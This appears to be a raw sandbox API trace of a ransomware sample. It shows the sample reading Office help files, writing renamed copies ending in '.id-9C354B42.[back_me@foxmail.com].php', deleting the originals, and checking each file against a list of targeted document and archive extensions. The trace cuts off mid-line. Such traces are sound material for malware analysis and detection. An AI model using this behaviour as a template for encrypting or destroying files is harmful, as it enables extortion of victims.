1 [0254.164] lstrcmpiW (lpString1=".HXC", lpString2=".php") returned -1 [0254.164] lstrlenW (lpString="MSPUB.DEV_COL.HXC") returned 17 [0254.164] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0254.164] GetFileSizeEx (in: hFile=0x38c, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=641) returned 1 [0254.164] CloseHandle (hObject=0x38c) returned 1 [0254.164] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_col.hxc")) returned 0x20 [0254.165] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_col.hxc.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0254.165] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x38c [0254.165] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0254.165] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0254.165] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_col.hxc.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a4 [0254.165] GetLastError () returned 0x0 [0254.165] ReadFile (in: hFile=0x38c, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x281, lpOverlapped=0x0) returned 1 [0254.179] WriteFile (in: hFile=0x3a4, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x290, lpOverlapped=0x0) returned 1 [0254.180] ReadFile (in: hFile=0x38c, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0254.180] WriteFile (in: hFile=0x3a4, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xf6, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xf6, lpOverlapped=0x0) returned 1 [0254.180] SetEndOfFile (hFile=0x3a4) returned 1 [0254.180] CloseHandle (hObject=0x3a4) returned 1 [0254.180] SetFilePointerEx (in: hFile=0x38c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0254.180] SetEndOfFile (hFile=0x38c) returned 1 [0254.182] CloseHandle (hObject=0x38c) returned 1 [0254.182] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0255.289] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub.dev_col.hxc")) returned 1 [0255.303] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC") returned 65 [0255.303] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC") returned 65 [0255.303] lstrlenW (lpString=".doc") returned 4 [0255.303] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1 [0255.303] lstrlenW (lpString=".docx") returned 5 [0255.303] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1 [0255.303] lstrlenW (lpString=".pdf") returned 4 [0255.303] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1 [0255.303] lstrlenW (lpString=".xls") returned 4 [0255.303] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1 [0255.303] lstrlenW (lpString=".xlsx") returned 5 [0255.303] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1 [0255.303] lstrlenW (lpString=".ppt") returned 4 [0255.303] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1 [0255.303] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC") returned 65 [0255.303] lstrlenW (lpString=".zip") returned 4 [0255.303] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1 [0255.304] lstrlenW (lpString=".rar") returned 4 [0255.304] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1 [0255.304] lstrlenW (lpString=".bz2") returned 4 [0255.304] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1 [0255.304] lstrlenW (lpString=".7z") returned 3 [0255.304] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1 [0255.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC") returned 65 [0255.304] lstrlenW (lpString=".dbf") returned 4 [0255.304] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1 [0255.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC") returned 65 [0255.304] lstrlenW (lpString=".1cd") returned 4 [0255.304] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1 [0255.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC") returned 65 [0255.304] lstrlenW (lpString=".jpg") returned 4 [0255.304] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1 [0255.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC") returned 65 [0255.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC") returned 65 [0255.304] lstrlenW (lpString=".doc") returned 4 [0255.304] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1 [0255.304] lstrlenW (lpString=".docx") returned 5 [0255.304] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1 [0255.304] lstrlenW (lpString=".pdf") returned 4 [0255.304] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1 [0255.304] lstrlenW (lpString=".xls") returned 4 [0255.304] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1 [0255.304] lstrlenW (lpString=".xlsx") returned 5 [0255.304] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1 [0255.304] lstrlenW (lpString=".ppt") returned 4 [0255.304] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1 [0255.304] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC") returned 65 [0255.304] lstrlenW (lpString=".zip") returned 4 [0255.305] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1 [0255.305] lstrlenW (lpString=".rar") returned 4 [0255.305] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1 [0255.305] lstrlenW (lpString=".bz2") returned 4 [0255.305] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1 [0255.305] lstrlenW (lpString=".7z") returned 3 [0255.305] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1 [0255.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC") returned 65 [0255.305] lstrlenW (lpString=".dbf") returned 4 [0255.305] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1 [0255.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC") returned 65 [0255.305] lstrlenW (lpString=".1cd") returned 4 [0255.305] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1 [0255.305] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB.DEV_COL.HXC") returned 65 [0255.305] lstrlenW (lpString=".jpg") returned 4 [0255.305] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1 [0255.305] lstrcmpiW (lpString1=".HXT", lpString2=".php") returned -1 [0255.305] lstrlenW (lpString="MSPUB_COL.HXT") returned 13 [0255.305] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_col.hxt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x354 [0255.315] GetFileSizeEx (in: hFile=0x354, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=205) returned 1 [0255.316] CloseHandle (hObject=0x354) returned 1 [0255.316] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_col.hxt")) returned 0x20 [0255.359] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_col.hxt.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0255.360] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_col.hxt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0255.360] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0255.360] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0255.360] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_col.hxt.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0255.360] GetLastError () returned 0x0 [0255.360] ReadFile (in: hFile=0x2e8, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0xcd, lpOverlapped=0x0) returned 1 [0255.361] WriteFile (in: hFile=0x370, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xd0, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xd0, lpOverlapped=0x0) returned 1 [0255.362] ReadFile (in: hFile=0x2e8, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0255.362] WriteFile (in: hFile=0x370, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xee, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xee, lpOverlapped=0x0) returned 1 [0255.362] SetEndOfFile (hFile=0x370) returned 1 [0255.362] CloseHandle (hObject=0x370) returned 1 [0255.362] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0255.362] SetEndOfFile (hFile=0x2e8) returned 1 [0255.364] CloseHandle (hObject=0x2e8) returned 1 [0255.364] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0255.364] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mspub_col.hxt")) returned 1 [0255.365] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT") returned 61 [0255.365] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT") returned 61 [0255.365] lstrlenW (lpString=".doc") returned 4 [0255.365] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1 [0255.365] lstrlenW (lpString=".docx") returned 5 [0255.365] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1 [0255.365] lstrlenW (lpString=".pdf") returned 4 [0255.365] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1 [0255.365] lstrlenW (lpString=".xls") returned 4 [0255.365] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1 [0255.365] lstrlenW (lpString=".xlsx") returned 5 [0255.365] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1 [0255.365] lstrlenW (lpString=".ppt") returned 4 [0255.365] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1 [0255.365] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT") returned 61 [0255.365] lstrlenW (lpString=".zip") returned 4 [0255.365] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1 [0255.365] lstrlenW (lpString=".rar") returned 4 [0255.365] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1 [0255.365] lstrlenW (lpString=".bz2") returned 4 [0255.365] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1 [0255.365] lstrlenW (lpString=".7z") returned 3 [0255.365] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1 [0255.365] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT") returned 61 [0255.365] lstrlenW (lpString=".dbf") returned 4 [0255.365] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1 [0255.365] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT") returned 61 [0255.365] lstrlenW (lpString=".1cd") returned 4 [0255.365] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1 [0255.365] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT") returned 61 [0255.365] lstrlenW (lpString=".jpg") returned 4 [0255.365] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1 [0255.366] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT") returned 61 [0255.366] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT") returned 61 [0255.366] lstrlenW (lpString=".doc") returned 4 [0255.366] lstrcmpiW (lpString1=".doc", lpString2=".HXT") returned -1 [0255.366] lstrlenW (lpString=".docx") returned 5 [0255.366] lstrcmpiW (lpString1=".docx", lpString2="L.HXT") returned -1 [0255.366] lstrlenW (lpString=".pdf") returned 4 [0255.366] lstrcmpiW (lpString1=".pdf", lpString2=".HXT") returned 1 [0255.366] lstrlenW (lpString=".xls") returned 4 [0255.366] lstrcmpiW (lpString1=".xls", lpString2=".HXT") returned 1 [0255.366] lstrlenW (lpString=".xlsx") returned 5 [0255.366] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXT") returned -1 [0255.366] lstrlenW (lpString=".ppt") returned 4 [0255.366] lstrcmpiW (lpString1=".ppt", lpString2=".HXT") returned 1 [0255.366] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT") returned 61 [0255.366] lstrlenW (lpString=".zip") returned 4 [0255.366] lstrcmpiW (lpString1=".zip", lpString2=".HXT") returned 1 [0255.366] lstrlenW (lpString=".rar") returned 4 [0255.366] lstrcmpiW (lpString1=".rar", lpString2=".HXT") returned 1 [0255.366] lstrlenW (lpString=".bz2") returned 4 [0255.366] lstrcmpiW (lpString1=".bz2", lpString2=".HXT") returned -1 [0255.366] lstrlenW (lpString=".7z") returned 3 [0255.366] lstrcmpiW (lpString1=".7z", lpString2="HXT") returned -1 [0255.366] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT") returned 61 [0255.366] lstrlenW (lpString=".dbf") returned 4 [0255.366] lstrcmpiW (lpString1=".dbf", lpString2=".HXT") returned -1 [0255.366] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT") returned 61 [0255.366] lstrlenW (lpString=".1cd") returned 4 [0255.366] lstrcmpiW (lpString1=".1cd", lpString2=".HXT") returned -1 [0255.366] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSPUB_COL.HXT") returned 61 [0255.366] lstrlenW (lpString=".jpg") returned 4 [0255.366] lstrcmpiW (lpString1=".jpg", lpString2=".HXT") returned 1 [0255.367] lstrcmpiW (lpString1=".HXC", lpString2=".php") returned -1 [0255.367] lstrlenW (lpString="MSTORE_COL.HXC") returned 14 [0255.367] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_col.hxc"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0255.367] GetFileSizeEx (in: hFile=0x2e8, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=626) returned 1 [0255.367] CloseHandle (hObject=0x2e8) returned 1 [0255.367] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_col.hxc")) returned 0x20 [0255.367] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_col.hxc.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0255.367] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_col.hxc"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2e8 [0255.367] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0255.367] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0255.367] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_col.hxc.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x370 [0255.368] GetLastError () returned 0x0 [0255.368] ReadFile (in: hFile=0x2e8, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x272, lpOverlapped=0x0) returned 1 [0255.377] WriteFile (in: hFile=0x370, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0x280, lpOverlapped=0x0) returned 1 [0255.378] ReadFile (in: hFile=0x2e8, lpBuffer=0x45c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a6fed4, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesRead=0x3a6fed4*=0x0, lpOverlapped=0x0) returned 1 [0255.378] WriteFile (in: hFile=0x370, lpBuffer=0x45c0020*, nNumberOfBytesToWrite=0xf0, lpNumberOfBytesWritten=0x3a6fc9c, lpOverlapped=0x0 | out: lpBuffer=0x45c0020*, lpNumberOfBytesWritten=0x3a6fc9c*=0xf0, lpOverlapped=0x0) returned 1 [0255.378] SetEndOfFile (hFile=0x370) returned 1 [0255.378] CloseHandle (hObject=0x370) returned 1 [0255.378] SetFilePointerEx (in: hFile=0x2e8, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a6fec8 | out: lpNewFilePointer=0x0) returned 1 [0255.378] SetEndOfFile (hFile=0x2e8) returned 1 [0255.380] CloseHandle (hObject=0x2e8) returned 1 [0255.380] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0255.460] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\mstore_col.hxc")) returned 1 [0255.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC") returned 62 [0255.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC") returned 62 [0255.460] lstrlenW (lpString=".doc") returned 4 [0255.460] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1 [0255.460] lstrlenW (lpString=".docx") returned 5 [0255.460] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1 [0255.460] lstrlenW (lpString=".pdf") returned 4 [0255.460] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1 [0255.460] lstrlenW (lpString=".xls") returned 4 [0255.460] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1 [0255.460] lstrlenW (lpString=".xlsx") returned 5 [0255.460] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1 [0255.460] lstrlenW (lpString=".ppt") returned 4 [0255.460] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1 [0255.460] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC") returned 62 [0255.460] lstrlenW (lpString=".zip") returned 4 [0255.460] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1 [0255.460] lstrlenW (lpString=".rar") returned 4 [0255.460] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1 [0255.460] lstrlenW (lpString=".bz2") returned 4 [0255.461] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1 [0255.461] lstrlenW (lpString=".7z") returned 3 [0255.461] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1 [0255.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC") returned 62 [0255.461] lstrlenW (lpString=".dbf") returned 4 [0255.461] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1 [0255.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC") returned 62 [0255.461] lstrlenW (lpString=".1cd") returned 4 [0255.461] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1 [0255.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC") returned 62 [0255.461] lstrlenW (lpString=".jpg") returned 4 [0255.461] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1 [0255.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC") returned 62 [0255.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC") returned 62 [0255.461] lstrlenW (lpString=".doc") returned 4 [0255.461] lstrcmpiW (lpString1=".doc", lpString2=".HXC") returned -1 [0255.461] lstrlenW (lpString=".docx") returned 5 [0255.461] lstrcmpiW (lpString1=".docx", lpString2="L.HXC") returned -1 [0255.461] lstrlenW (lpString=".pdf") returned 4 [0255.461] lstrcmpiW (lpString1=".pdf", lpString2=".HXC") returned 1 [0255.461] lstrlenW (lpString=".xls") returned 4 [0255.461] lstrcmpiW (lpString1=".xls", lpString2=".HXC") returned 1 [0255.461] lstrlenW (lpString=".xlsx") returned 5 [0255.461] lstrcmpiW (lpString1=".xlsx", lpString2="L.HXC") returned -1 [0255.461] lstrlenW (lpString=".ppt") returned 4 [0255.461] lstrcmpiW (lpString1=".ppt", lpString2=".HXC") returned 1 [0255.461] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC") returned 62 [0255.461] lstrlenW (lpString=".zip") returned 4 [0255.461] lstrcmpiW (lpString1=".zip", lpString2=".HXC") returned 1 [0255.461] lstrlenW (lpString=".rar") returned 4 [0255.461] lstrcmpiW (lpString1=".rar", lpString2=".HXC") returned 1 [0255.461] lstrlenW (lpString=".bz2") returned 4 [0255.461] lstrcmpiW (lpString1=".bz2", lpString2=".HXC") returned -1 [0255.462] lstrlenW (lpString=".7z") returned 3 [0255.462] lstrcmpiW (lpString1=".7z", lpString2="HXC") returned -1 [0255.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC") returned 62 [0255.462] lstrlenW (lpString=".dbf") returned 4 [0255.462] lstrcmpiW (lpString1=".dbf", lpString2=".HXC") returned -1 [0255.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC") returned 62 [0255.462] lstrlenW (lpString=".1cd") returned 4 [0255.462] lstrcmpiW (lpString1=".1cd", lpString2=".HXC") returned -1 [0255.462] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\Office14\\1033\\MSTORE_COL.HXC") returned 62 [0255.462] lstrlenW (lpString=".jpg") returned 4 [0255.462] lstrcmpiW (lpString1=".jpg", lpString2=".HXC") returned 1 [0255.462] lstrcmpiW (lpString1=".VRD", lpString2=".php") returned 1 [0255.462] lstrlenW (lpString="NETWORK2.VRD") returned 12 [0255.462] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\network2.vrd"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x200 [0255.474] GetFileSizeEx (in: hFile=0x200, lpFileSize=0x3a6ff1c | out: lpFileSize=0x3a6ff1c*=2150) returned 1 [0255.474] CloseHandle (hObject=0x200) returned 1 [0255.474] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD" (normalized: "c:\\program files\\microsoft office\\office14\\1033\\network2.vrd")) returned 0x20 [0255.539] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\Office14\\1033\\NETWORK2.VRD.id-9C354B42.[back_me@foxmail.com].php" 